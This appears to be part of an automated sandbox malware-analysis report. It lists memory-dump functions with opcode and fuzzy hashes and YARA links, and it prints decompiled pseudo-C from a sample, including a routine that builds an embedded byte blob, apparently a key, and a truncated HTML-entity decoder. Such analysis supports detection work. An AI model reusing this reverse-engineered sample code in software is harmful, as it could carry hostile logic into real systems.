Memory Dump Source

Source File: 0000000A.00000002.326872401.00000000025D0000.00000040.00000040.sdmp, Offset: 025D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a30c06bc96f2bceaac52cbea744aef45baec3507deb223a7b439976aa045eb2
Instruction ID: ec474bb2ebbe107edea29aca372bf42ed1e3948926f1c42282dfaa2504dfeb4b
Opcode Fuzzy Hash: 9a30c06bc96f2bceaac52cbea744aef45baec3507deb223a7b439976aa045eb2
Instruction Fuzzy Hash: 630126B65083809FD7128F06EC00862FFB8EE8A220708C0DFED898B312D225A905CB71

Uniqueness

Uniqueness Score: -1.00%

Function 025D0818, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.326872401.00000000025D0000.00000040.00000040.sdmp, Offset: 025D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 525cef522958239b2deb72ab7ac90410e2832b06fb356f1b7ca8807ee3c9392c
Instruction ID: 77ce895019a57e45f40b82ce5d6f8bbc6f373484eff17a90dfd6513944c8ef48
Opcode Fuzzy Hash: 525cef522958239b2deb72ab7ac90410e2832b06fb356f1b7ca8807ee3c9392c
Instruction Fuzzy Hash: B4F0FB35144644DFC215CB44D940B26FBA2FB89718F24CAA9E9490B652C3379813DE85

Uniqueness

Uniqueness Score: -1.00%

Function 025D05F6, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.326872401.00000000025D0000.00000040.00000040.sdmp, Offset: 025D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29e5a1b67f36e52b8989c512f0d5f64cf7354b2feecfdb44347a21014a4487a5
Instruction ID: 972124e293325c0f60f012fc97b3d2522df786f19343aede69d39a5502c4cd18
Opcode Fuzzy Hash: 29e5a1b67f36e52b8989c512f0d5f64cf7354b2feecfdb44347a21014a4487a5
Instruction Fuzzy Hash: ADE092766006008BD750CF0BEC41452F7D8EB88630B18C47FDC0D8B700E135B905CEA5

Uniqueness

Uniqueness Score: -1.00%

Function 065A1747, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.340883404.00000000065A0000.00000040.00000001.sdmp, Offset: 065A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef0af6e5856e507c767d66a34d212fe478a1ba17d775b493af8c2d8071a15ae3
Instruction ID: e310d6677486010cd37610423510fac31b8c36303f2bbfcec82f7855b6f87cac
Opcode Fuzzy Hash: ef0af6e5856e507c767d66a34d212fe478a1ba17d775b493af8c2d8071a15ae3
Instruction Fuzzy Hash: ACE0D8725003046BD250DE0AEC45B53FF98DB40A30F14C45BEE081B301D172B914CEF1

Uniqueness

Uniqueness Score: -1.00%

Function 065A1433, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.340883404.00000000065A0000.00000040.00000001.sdmp, Offset: 065A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a46806fc9a07ed6d93c1d4b133ded5af1c81e7456043e2285cb3b7da27e107ae
Instruction ID: 3679b9d9e723a5e54d38033292caee63fae3a4a941bede5aa526bef35d871f87
Opcode Fuzzy Hash: a46806fc9a07ed6d93c1d4b133ded5af1c81e7456043e2285cb3b7da27e107ae
Instruction Fuzzy Hash: 6DE0D8725003046BD2508F0ADC45B53FB58DB40A30F14C45BEE081B742E171B9148AF1

Uniqueness

Uniqueness Score: -1.00%

Function 065A1D23, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.340883404.00000000065A0000.00000040.00000001.sdmp, Offset: 065A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 407927e155725424f340a8eea53b030a6e4ba1d8cc4c18a2df51f0b4933ed223
Instruction ID: b932e03d1d89e43a92b1382e92245a2bf1432e3339b0338cbc61ca2230bd00b8
Opcode Fuzzy Hash: 407927e155725424f340a8eea53b030a6e4ba1d8cc4c18a2df51f0b4933ed223
Instruction Fuzzy Hash: 8BE0D8725003046BD2509E0ADC85B53FF98DB40A30F14C45BEE0C1B302D172B9048AF1

Uniqueness

Uniqueness Score: -1.00%

Function 065A1E9B, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.340883404.00000000065A0000.00000040.00000001.sdmp, Offset: 065A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e8347b16817e2b9e8103cb0b98cb57ccb06c6d2cfdc9c1c19d604da17e5da54
Instruction ID: 5179f02d9400c2ebfe5da495f2b4d039300e8238f13eedbf4ac522e010bc9059
Opcode Fuzzy Hash: 3e8347b16817e2b9e8103cb0b98cb57ccb06c6d2cfdc9c1c19d604da17e5da54
Instruction Fuzzy Hash: 5BE0D8B25403046BD2508E0ADC45B53FF98DB44A30F14C46BEE081B341D171B9148AF1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00C919A0, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.326395711.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e1488b195227dc10e436e26b276f8855c27998593ae0c4e5f16f70cf97cdb45
Instruction ID: 05de74206b6f30f932afe46f40c17dd64a918359f91559d0647438c3489e1e9a
Opcode Fuzzy Hash: 4e1488b195227dc10e436e26b276f8855c27998593ae0c4e5f16f70cf97cdb45
Instruction Fuzzy Hash: F821197490124ADFCB04DFA8C4497EDBBB1BF45301F5485AAD804AB391CB749F85DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C919B0, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.326395711.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 699c92a30cb8e46fb39aadbcfa5a22fc03827f2798c173477d014867fb65acb3
Instruction ID: 70f5e01d60a4930ac6a1ecd24dffb1232b45d2340c43947ac25d19bd93a93152
Opcode Fuzzy Hash: 699c92a30cb8e46fb39aadbcfa5a22fc03827f2798c173477d014867fb65acb3
Instruction Fuzzy Hash: 4121D070A0120ADFCB04EFA8C549BEDBBB2AB45301F5485AA980567395CB749F85DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C94830, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.326395711.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eb0334cbbb8c64cc36ffcfebb483a4845fdba281b97f745b7d61f020805df2
Instruction ID: fa3f27babfa531344c673ee2838d08aeafdb7df6977f7958a46420bf61067df7
Opcode Fuzzy Hash: 96eb0334cbbb8c64cc36ffcfebb483a4845fdba281b97f745b7d61f020805df2
Instruction Fuzzy Hash: D3211474D06218DFDB04DFA4C548BEEBBF0AB09304F2184AAC400BB291D7798E89DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00C914C0, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.326395711.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
Instruction ID: 60f139cf7682f6bc42b0df27c9cd53f699ab0a763741afb342ac6439c3327332
Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
Instruction Fuzzy Hash: 9CB09236E440099ADF008EC5B4463FCF770E786329F282163D619B35018235826856C9

Uniqueness

Uniqueness Score: -1.00%

Function 00C917F8, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.326395711.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
Instruction ID: 82cad9e1400fc1de22f5a9635bb339e03c480b0d5e4478b8f0a7082ab74b9950
Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
Instruction Fuzzy Hash: 40B0923AE0400A9ADF008EC5B4463FCF7B4E782229F242063C628B3510823182685689

Uniqueness

Uniqueness Score: -1.00%

Function 00C90728, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.326395711.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
Instruction ID: d6a42fbdcb01b6df2baac4cca9e52dcd654608c0bc83ea2acf6595d8553b9d11
Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
Instruction Fuzzy Hash: 7FB09236E040089ADF008EC5B4853FCF770E782239F202063C218B3541823192685A89

Uniqueness

Uniqueness Score: -1.00%

Function 0015B1E6, Relevance: 60.3, Strings: 48, Instructions: 282
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0015B1E6(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char* _v8;
				char _v12;
				signed char* _v16;
				signed char* _v20;
				signed char* _v24;
				char _v152;
				char _v153;
				char _v154;
				char _v155;
				char _v156;
				char _v157;
				char _v158;
				char _v159;
				char _v160;
				char _v161;
				char _v162;
				char _v163;
				char _v164;
				char _v165;
				char _v166;
				char _v167;
				char _v168;
				char _v169;
				char _v170;
				char _v171;
				char _v172;
				char _v173;
				char _v174;
				char _v175;
				char _v176;
				char _v177;
				char _v178;
				char _v179;
				char _v180;
				char _v181;
				char _v182;
				char _v183;
				char _v184;
				char _v185;
				char _v186;
				char _v187;
				char _v188;
				char _v189;
				char _v190;
				char _v191;
				char _v192;
				char _v193;
				char _v194;
				char _v195;
				char _v196;
				char _v197;
				char _v198;
				char _v199;
				char _v200;
				char _v201;
				char _v202;
				char _v203;
				char _v204;
				char _v205;
				char _v206;
				char _v207;
				char _v208;
				char _v209;
				char _v210;
				char _v211;
				char _v212;
				char _v213;
				char _v214;
				char _v215;
				char _v216;
				char _v217;
				char _v218;
				char _v219;
				char _v220;
				char _v221;
				char _v222;
				char _v223;
				char _v224;
				char _v225;
				char _v226;
				char _v227;
				char _v228;
				char _v229;
				char _v230;
				signed char* _v231;
				char _v232;
				char _v233;
				char _v234;
				char _v235;
				char _v236;
				char _v237;
				char _v238;
				char _v239;
				char _v240;
				char _v241;
				char _v242;
				char _v243;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				char _v254;
				char _v255;
				char _v256;
				char _v257;
				char _v258;
				char _v259;
				char _v260;
				char _v261;
				char _v262;
				char _v263;
				char _v264;
				char _v265;
				char _v266;
				char _v267;
				char _v268;
				char _v269;
				char _v270;
				char _v271;
				char _v272;
				char _v273;
				char _v274;
				char _v275;
				char _v276;
				char _v277;
				char _v278;
				char _v279;
				char _v280;
				signed char* _v284;
				char _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				signed int _v300;
				char _v320;
				void _v348;
				void* __ebx;
				void* __edi;
				void* _t178;
				void* _t180;
				void* _t182;
				signed char* _t184;
				intOrPtr _t219;
				signed int _t231;
				intOrPtr _t242;

				_t242 = __ecx;
				_push(0x44356c);
				_v292 = __ecx;
				_a4 = _a4 + 4;
				_t178 = E0016105D(_a4 + 4);
				_push(_t178);
				L0019B581();
				_t219 = _a8;
				if(_t178 == 0) {
					E00161069(E0016105D(_t219 + 4) | 0xffffffff, __ecx + 0x2c, _t216);
				}
				_push(0x44357c);
				_t180 = E0016105D(_a4);
				_push(_t180);
				L0019B581();
				if(_t180 == 0) {
					E00161069(E0016105D(_t219 + 4) | 0xffffffff, _t242 + 0x40, _t212);
				}
				_push(0x443588);
				_t182 = E0016105D(_a4);
				_push(_t182);
				L0019B581();
				if(_t182 == 0) {
					E00161069(E0016105D(_t219 + 4) | 0xffffffff, _t242 + 0x54, _t208);
				}
				_push(0x443598);
				_t184 = E0016105D(_a4);
				_push(_t184);
				L0019B581();
				if(_t184 != 0) {
					L13:
					return _t184;
				} else {
					_v24 = _t184;
					_v16 = _t184;
					_v20 = _t184;
					_v280 = 0x1d;
					_v279 = 0xac;
					_v278 = 0xa8;
					_v277 = 0xf8;
					_v276 = 0xd3;
					_v275 = 0xb8;
					_v274 = 0x48;
					_v273 = 0x3e;
					_v272 = 0x48;
					_v271 = 0x7d;
					_v270 = 0x3e;
					_v269 = 0xa;
					_v268 = 0x62;
					_v267 = 7;
					_v266 = 0xdd;
					_v265 = 0x26;
					_v264 = 0xe6;
					_v263 = 0x67;
					_v262 = 0x81;
					_v261 = 3;
					_v260 = 0xe7;
					_v259 = 0xb2;
					_v258 = 0x13;
					_v257 = 0xa5;
					_v256 = 0xb0;
					_v255 = 0x79;
					_v254 = 0xee;
					_v253 = 0x4f;
					_v252 = 0xf;
					_v251 = 0x41;
					_v250 = 0x15;
					_v249 = 0xed;
					_v248 = 0x7b;
					_v247 = 0x14;
					_v246 = 0x8c;
					_v245 = 0xe5;
					_v244 = 0x4b;
					_v243 = 0x46;
					_v242 = 0xd;
					_v241 = 0xc1;
					_v240 = 0x8e;
					_v239 = 0xfe;
					_v238 = 0xd6;
					_v237 = 0xe7;
					_v236 = 0x27;
					_v235 = 0x75;
					_v234 = 6;
					_v233 = 0x8b;
					_v232 = 0x49;
					_v231 = _t184;
					_v230 = 0xdc;
					_v229 = 0xf;
					_v228 = 0x30;
					_v227 = 0xa0;
					_v226 = 0x9e;
					_v225 = 0xfd;
					_v224 = 9;
					_v223 = 0x85;
					_v222 = 0xf1;
					_v221 = 0xc8;
					_v220 = 0xaa;
					_v219 = 0x75;
					_v218 = 0xc1;
					_v217 = 8;
					_v216 = 5;
					_v215 = 0x79;
					_v214 = 1;
					_v213 = 0xe2;
					_v212 = 0x97;
					_v211 = 0xd8;
					_v210 = 0xaf;
					_v209 = 0x80;
					_v208 = 0x38;
					_v207 = 0x60;
					_v206 = 0xb;
					_v205 = 0x71;
					_v204 = 0xe;
					_v203 = 0x68;
					_push(0x80);
					_push(_t184);
					_push( &_v152);
					_v202 = 0x53;
					_v201 = 0x77;
					_v200 = 0x2f;
					_v199 = 0xf;
					_v198 = 0x61;
					_v197 = 0xf6;
					_v196 = 0x1d;
					_v195 = 0x8e;
					_v194 = 0x8f;
					_v193 = 0x5c;
					_v192 = 0xb2;
					_v191 = 0x3d;
					_v190 = 0x21;
					_v189 = 0x74;
					_v188 = 0x40;
					_v187 = 0x4b;
					_v186 = 0xb5;
					_v185 = 6;
					_v184 = 0x6e;
					_v183 = 0xab;
					_v182 = 0x7a;
					_v181 = 0xbd;
					_v180 = 0x8b;
					_v179 = 0xa9;
					_v178 = 0x7e;
					_v177 = 0x32;
					_v176 = 0x8f;
					_v175 = 0x6e;
					_v174 = 6;
					_v173 = 0x24;
					_v172 = 0xd9;
					_v171 = 0x29;
					_v170 = 0xa4;
					_v169 = 0xa5;
					_v168 = 0xbe;
					_v167 = 0x26;
					_v166 = 0x23;
					_v165 = 0xfd;
					_v164 = 0xee;
					_v163 = 0xf1;
					_v162 = 0x4c;
					_v161 = 0xf;
					_v160 = 0x74;
					_v159 = 0x5e;
					_v158 = 0x58;
					_v157 = 0xfb;
					_v156 = 0x91;
					_v155 = 0x74;
					_v154 = 0xef;
					_v153 = 0x91;
					L0019B531();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t231 = 7;
					_push(0x11);
					asm("movsb");
					_push( &_v320);
					_push( &_v152);
					memcpy( &_v348, 0x4435b8, _t231 << 2);
					L0019B575();
					_v8 =  &_v280;
					_v296 =  *((intOrPtr*)(_t219 + 0x18));
					_v12 = 0x90;
					_v300 =  *(_t219 + 2) & 0x0000ffff;
					if(E0015C860( &_v24,  &_v300,  &_v12, 0,  &_v288) != 0) {
						L9:
						_t184 = _v284;
						if(_t184 != 0) {
							E0016118A(_v292 + 0x68,  &(_t184[4]),  *_t184 & 0x000000ff, 0);
							_t184 =  *0x4430d8(_v284);
						}
						L11:
						if(_v24 == 0) {
							goto L13;
						}
						return  *0x443100(_v24);
					}
					_push(0x1c);
					_push( &_v348);
					_push( &_v152);
					L0019B575();
					_v8 =  &_v280;
					_v12 = 0x9b;
					_t184 = E0015C860( &_v24,  &_v300,  &_v12, 0,  &_v288);
					if(_t184 == 0) {
						goto L11;
					}
					goto L9;
				}
			}

0x0015b1f8
0x0015b1fa
0x0015b1ff
0x0015b205
0x0015b208
0x0015b20d
0x0015b20e
0x0015b215
0x0015b21a
0x0015b22b
0x0015b22b
0x0015b233
0x0015b238
0x0015b23d
0x0015b23e
0x0015b247
0x0015b258
0x0015b258
0x0015b260
0x0015b265
0x0015b26a
0x0015b26b
0x0015b274
0x0015b285
0x0015b285
0x0015b28d
0x0015b292
0x0015b297
0x0015b298
0x0015b2a1
0x0015b744
0x0015b744
0x0015b2a7
0x0015b2a7
0x0015b2aa
0x0015b2ad
0x0015b2b0
0x0015b2b7
0x0015b2be
0x0015b2c5
0x0015b2cc
0x0015b2d3
0x0015b2da
0x0015b2e1
0x0015b2e8
0x0015b2ef
0x0015b2f6
0x0015b2fd
0x0015b304
0x0015b30b
0x0015b312
0x0015b319
0x0015b320
0x0015b327
0x0015b32e
0x0015b335
0x0015b33c
0x0015b343
0x0015b34a
0x0015b351
0x0015b358
0x0015b35f
0x0015b366
0x0015b36d
0x0015b374
0x0015b37b
0x0015b382
0x0015b389
0x0015b390
0x0015b397
0x0015b39e
0x0015b3a5
0x0015b3ac
0x0015b3b3
0x0015b3ba
0x0015b3c1
0x0015b3c8
0x0015b3cf
0x0015b3d6
0x0015b3dd
0x0015b3e4
0x0015b3eb
0x0015b3f2
0x0015b3f9
0x0015b400
0x0015b407
0x0015b40d
0x0015b414
0x0015b41b
0x0015b422
0x0015b429
0x0015b430
0x0015b437
0x0015b43e
0x0015b445
0x0015b44c
0x0015b453
0x0015b45a
0x0015b461
0x0015b468
0x0015b46f
0x0015b476
0x0015b47d
0x0015b484
0x0015b48b
0x0015b492
0x0015b499
0x0015b4a0
0x0015b4a7
0x0015b4ae
0x0015b4b5
0x0015b4bc
0x0015b4c3
0x0015b4ca
0x0015b4d1
0x0015b4d6
0x0015b4dd
0x0015b4de
0x0015b4e5
0x0015b4ec
0x0015b4f3
0x0015b4fa
0x0015b501
0x0015b508
0x0015b50f
0x0015b516
0x0015b51d
0x0015b524
0x0015b52b
0x0015b532
0x0015b539
0x0015b540
0x0015b547
0x0015b54e
0x0015b555
0x0015b55c
0x0015b563
0x0015b56a
0x0015b571
0x0015b578
0x0015b57f
0x0015b586
0x0015b58d
0x0015b594
0x0015b59b
0x0015b5a2
0x0015b5a9
0x0015b5b0
0x0015b5b7
0x0015b5be
0x0015b5c5
0x0015b5cc
0x0015b5d3
0x0015b5da
0x0015b5e1
0x0015b5e8
0x0015b5ef
0x0015b5f6
0x0015b5fd
0x0015b604
0x0015b60b
0x0015b612
0x0015b619
0x0015b620
0x0015b627
0x0015b62e
0x0015b635
0x0015b63c
0x0015b64c
0x0015b64d
0x0015b64e
0x0015b651
0x0015b652
0x0015b653
0x0015b65b
0x0015b65c
0x0015b66e
0x0015b66f
0x0015b671
0x0015b67c
0x0015b682
0x0015b68f
0x0015b696
0x0015b6bb
0x0015b704
0x0015b704
0x0015b70c
0x0015b720
0x0015b72b
0x0015b72b
0x0015b731
0x0015b735
0x00000000
0x00000000
0x00000000
0x0015b73a
0x0015b6bd
0x0015b6c5
0x0015b6cc
0x0015b6cd
0x0015b6db
0x0015b6f4
0x0015b6fb
0x0015b702
0x00000000
0x00000000
0x00000000
0x0015b702

Strings

#, xrefs: 0015B5DA
X, xrefs: 0015B612
t, xrefs: 0015B539
z, xrefs: 0015B56A
&, xrefs: 0015B319
~, xrefs: 0015B586
H, xrefs: 0015B2E8
t, xrefs: 0015B627
n, xrefs: 0015B59B
), xrefs: 0015B5B7
8, xrefs: 0015B4A7
q, xrefs: 0015B4BC
u, xrefs: 0015B45A
>, xrefs: 0015B2E1
u, xrefs: 0015B3EB
/, xrefs: 0015B4EC
}, xrefs: 0015B2EF
w, xrefs: 0015B4E5
g, xrefs: 0015B327
`, xrefs: 0015B4AE
2, xrefs: 0015B58D
^, xrefs: 0015B60B
&, xrefs: 0015B5D3
t, xrefs: 0015B604
A, xrefs: 0015B37B
{, xrefs: 0015B390
O, xrefs: 0015B36D
>, xrefs: 0015B2F6
K, xrefs: 0015B3AC
I, xrefs: 0015B400
\, xrefs: 0015B51D
$, xrefs: 0015B5A9
@, xrefs: 0015B540
y, xrefs: 0015B476
b, xrefs: 0015B304
h, xrefs: 0015B4CA
0, xrefs: 0015B41B
n, xrefs: 0015B55C
F, xrefs: 0015B3B3
L, xrefs: 0015B5F6
K, xrefs: 0015B547
', xrefs: 0015B3E4
a, xrefs: 0015B4FA
H, xrefs: 0015B2DA
!, xrefs: 0015B532
S, xrefs: 0015B4DE
y, xrefs: 0015B35F
=, xrefs: 0015B52B

Memory Dump Source

Source File: 0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000A.00000002.323770575.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.323942362.00000000001D2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$F$H$H$I$K$K$L$O$S$X$\$^$`$a$b$g$h$n$n$q$t$t$t$u$u$w$y$y$z${$}$~
API String ID: 0-140969752
Opcode ID: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
Instruction ID: 118c7810e7a8e329be081001cd965a98456d704a3c8ad91d2a0dbceafa65731b
Opcode Fuzzy Hash: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
Instruction Fuzzy Hash: C5F1FD209087E9D9DB32C7788C497CDBE645B23324F0842D9E1E87A2D2D7B54BC58B66

Uniqueness

Uniqueness Score: -1.00%

Function 001BE67A, Relevance: 57.8, Strings: 46, Instructions: 307
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E001BE67A(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				void* _v11;
				char _v12;
				char _v13;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				signed int _v28;
				short _v30;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v76;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr* _t200;
				char* _t202;
				signed int _t203;
				intOrPtr _t207;
				intOrPtr _t209;
				intOrPtr _t212;
				char _t215;
				intOrPtr _t216;
				short _t219;
				signed int _t224;
				intOrPtr* _t225;
				intOrPtr _t230;
				intOrPtr* _t231;
				intOrPtr* _t233;
				intOrPtr* _t238;
				signed int _t239;
				signed int _t242;
				intOrPtr _t243;
				intOrPtr* _t244;
				signed int _t245;
				void* _t247;
				void* _t248;
				void* _t249;

				_v64 = 0x413f68;
				_v60 = 0x413f70;
				_v56 = 0x413f74;
				_v52 = 0x413f78;
				_v48 = 0x413f80;
				_v44 = 0x413f88;
				_v24 = 0x26;
				_v23 = 0x3c;
				_v22 = 0x3e;
				_v21 = 0x22;
				_v20 = 0x20;
				_v19 = 0x27;
				_v468 = 0x413f90;
				_v464 = 0x413f98;
				_v460 = 0x413fa0;
				_v456 = 0x413fa8;
				_v452 = 0x413fb0;
				_v448 = 0x413fb8;
				_v444 = 0x413fc0;
				_v440 = 0x413fc8;
				_v436 = 0x413fd0;
				_v432 = 0x413fd8;
				_v428 = 0x413fe0;
				_v424 = 0x413fe8;
				_v420 = 0x413ff0;
				_v416 = 0x413ff8;
				_v412 = 0x414000;
				_v408 = 0x414008;
				_v404 = 0x414010;
				_v400 = 0x414018;
				_v396 = 0x414020;
				_v392 = 0x414028;
				_v388 = 0x414030;
				_v384 = 0x414038;
				_v380 = 0x414040;
				_v376 = 0x414048;
				_v372 = 0x414050;
				_v368 = 0x414058;
				_v364 = 0x414060;
				_v360 = 0x414068;
				_v356 = 0x414070;
				_v352 = 0x414078;
				_v348 = 0x414080;
				_v344 = 0x414088;
				_v340 = 0x414090;
				_v336 = 0x414098;
				_v332 = 0x4140a0;
				_v328 = 0x4140a8;
				_v324 = 0x4140b0;
				_v320 = 0x4140b8;
				_v316 = 0x4140c0;
				_v312 = 0x4140c8;
				_v308 = 0x4140d0;
				_v304 = 0x4140d8;
				_v300 = 0x4140e0;
				_v296 = 0x4140e8;
				_v292 = 0x4140f0;
				_v288 = 0x4140f8;
				_v284 = 0x414100;
				_v280 = 0x414108;
				_v276 = 0x414110;
				_v272 = 0x414118;
				_v268 = 0x414120;
				_v264 = 0x414128;
				_v260 = 0x414130;
				_v256 = 0x414138;
				_v252 = 0x414140;
				_v248 = 0x414148;
				_v244 = 0x414150;
				_v240 = 0x414158;
				_v236 = 0x414160;
				_v232 = 0x414168;
				_v228 = 0x414170;
				_v224 = 0x414178;
				_v220 = 0x414180;
				_v216 = 0x414188;
				_v212 = 0x414190;
				_v208 = 0x414198;
				_v204 = 0x4141a0;
				_t200 = _a8;
				_v28 = _v28 | 0xffffffff;
				_t224 = 0;
				_t247 = 0;
				_v200 = 0x4141a8;
				_v196 = 0x4141b0;
				_v192 = 0x4141b8;
				_v188 = 0x4141c0;
				_v184 = 0x4141c8;
				_v180 = 0x4141d0;
				_v176 = 0x4141d8;
				_v172 = 0x4141e0;
				_v168 = 0x4141e8;
				_v164 = 0x4141f0;
				_v160 = 0x4141f8;
				_v156 = 0x414200;
				_v152 = 0x414208;
				_v148 = 0x414210;
				_v144 = 0x414218;
				_v140 = 0x414220;
				_v136 = 0x414228;
				_v132 = 0x414230;
				_v128 = 0x414238;
				_v124 = 0x414240;
				_v120 = 0x414248;
				_v116 = 0x414250;
				_v112 = 0x414258;
				_v108 = 0x414260;
				_v104 = 0x414268;
				_v100 = 0x414270;
				_v96 = 0x414278;
				_v92 = 0x414280;
				if( *_t200 == 0) {
					L45:
					_t202 = _a4 + _t224;
					 *_t202 = 0;
					if(_a20 == 0 || _t224 <= 0 ||  *((char*)(_t202 - 1)) != 0x20) {
						return _t202;
					} else {
						 *((char*)(_t202 - 1)) = 0;
						return _t202;
					}
				}
				while(_a12 == 0xffffffff || _a12 > _t247) {
					_t225 = _t247 + _t200;
					_t203 =  *_t225;
					_v13 = _t203;
					if(_t203 != 0x26) {
						L33:
						if(_a16 == 0 || _t203 > 0x20) {
							 *((char*)(_t224 + _a4)) = _t203;
							_t224 = _t224 + 1;
						} else {
							if(_t224 != _v28) {
								 *((char*)(_t224 + _a4)) = 0x20;
								_t224 = _t224 + 1;
								if(_a20 != 0 && _t224 == 1) {
